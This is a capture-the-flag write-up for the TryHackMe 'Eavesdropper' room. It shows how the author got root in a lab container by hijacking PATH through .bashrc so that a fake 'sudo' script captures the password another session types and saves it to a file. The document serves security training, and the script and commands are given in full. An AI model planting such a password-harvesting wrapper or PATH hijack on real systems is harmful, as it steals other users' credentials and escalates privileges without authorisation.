https://tryhackme.com/room/eavesdropper

Difficulty : Medium

Enumeration :

This room provides the ssh keys for “frank” to get initial access. So, I downloaded the key and modified it to ‘chmod 600’ and logged in as “frank”.

I started by checking the running processes and found that very few processes were running and also “frank” has sudo access as well:

I assumed that this might be a docker environment. To confirm, I ran the ‘ls -la’ command to list all the files in the root directory and found a file called “.dockerenv” which confirmed my environment as a docker.

---

Priv Esc :

Moving ahead, I checked with LinPeas for the privilege escalation vector but didn’t find anything. After that, I checked for the running processes using ‘pspy’.

I observed that someone else was also using the ‘frank’ account and using it to check the shadow file, happening every ~30 seconds. So it’s a scheduled process, and if we can abuse this scheduled job, we can have the root password.

As the other user also has the same access as ‘frank’, we can exploit the ‘PATH’ and place a false ‘sudo’ file to be executed.

frank@workstation:~$ mkdir ./bin
frank@workstation:~$ touch ./bin/sudo
frank@workstation:~$ chmod +x ./bin/sudo

Since ‘frank’sudo access requires the sudo password, we can use the following script and put it into our own created sudo file. The script will take the sudo password and store it in a file:

#!/bin/bash

echo "Enter password: "
read -s password

echo $password >> /home/frank/password.txt

After this, we need to redirect the PATH of ‘frank’, which can be done by adding the following line in the .bashrc file:

export PATH=/home/frank/bin:$PATH

After doing this, we just have to wait for some time and then we can get the password from the ‘password.txt’ file.

Using the gathered password, I switched the user to sudo.

After switching to sudo, I got the flag in the root home directory. (pwn3d!🙂)